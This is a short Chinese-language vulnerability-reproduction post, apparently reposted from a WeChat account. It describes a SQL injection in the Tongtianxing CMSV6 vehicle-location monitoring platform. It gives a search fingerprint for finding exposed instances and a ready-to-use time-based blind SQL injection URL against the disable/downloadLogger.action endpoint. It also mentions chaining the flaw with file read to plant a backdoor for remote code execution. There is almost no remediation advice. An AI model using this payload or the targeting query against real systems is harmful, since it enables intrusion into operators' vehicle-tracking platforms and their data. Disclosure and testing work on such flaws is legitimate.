通天星存在disable SQL注入漏洞 admin 125445文章 98评论 2024年7月31日15:28:35评论16 views字数 327阅读1分5秒阅读模式 1 漏洞描述 该漏洞是由于通天星CMSV6车载定位监控平台/edu_security_officer/disable接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。该漏洞可配合任意文件读取获取网站绝对路径写入后门文件进行远程代码执行。 2 漏洞复现 首页 sqlmap验证 3 网络测绘 body="808gps" 4 漏洞POC 地址/edu_security_officer/disable;downloadLogger.action?ids=1 AND (SELECT 9252 FROM (SELECT(SLEEP(5)))yrRB) 原文始发于微信公众号(我吃饼干):【漏洞复现】通天星存在disable SQL注入漏洞 点赞 https://cn-sec.com/archives/2994199.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论